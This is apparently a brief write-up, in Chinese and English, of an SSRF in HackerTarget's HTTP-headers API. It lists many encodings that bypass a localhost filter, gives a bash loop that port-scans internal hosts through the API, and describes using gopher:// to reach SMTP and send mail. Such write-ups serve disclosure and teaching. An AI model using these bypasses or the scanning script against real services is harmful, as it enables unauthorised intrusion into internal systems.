Hacking the Hackers: Leveraging an SSRF in HackerTarget

本文介绍了如何利用SSRF发送email。

https://api.hackertarget.com/httpheaders/?q=<target>

正常情况下target是传送第三方网站地址,如example.com. 但是黑客发现可以发送127.0.0.1.

Initial Fix

只检测127.0.0.1.

Bypass

0
127.00.1
127.0.01
0.00.0
0.0.00
127.1.0.1
127.10.1
127.1.01
0177.1
0177.0001.0001
0x0.0x0.0x0.0x0
0000.0000.0000.0000
0x7f.0x0.0x0.0x1
0177.0000.0000.0001
0177.0001.0000..0001
0x7f.0x1.0x0.0x1
0x7f.0x1.0x1
localtest.me

Automation

#!/usr/bin/env bash
for port in `seq 1 9999`
do
	echo -e "\n\n[+] Checking Port: "$port"\n"
	curl 'https://api.hackertarget.com/httpheaders/?q=http://'$1':'$port && echo -e "\n"
done

SMTP

经过一轮测试,发现端口25被打开。 而且服务器不但支持http://https://, 还支持dict://gopher://. (更多协议参考Medium).

于是就利用其发送email.

In a nutshell, the gopher:// protocol sends 1 character, a new line (CR+LF), and the remaining data, which allows us to send a multiline request.

Ref

Show Comments